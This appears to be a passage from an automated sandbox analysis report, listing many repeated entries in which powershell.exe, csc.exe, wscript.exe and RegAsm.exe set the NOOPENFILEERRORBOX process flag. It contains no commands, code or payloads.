                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
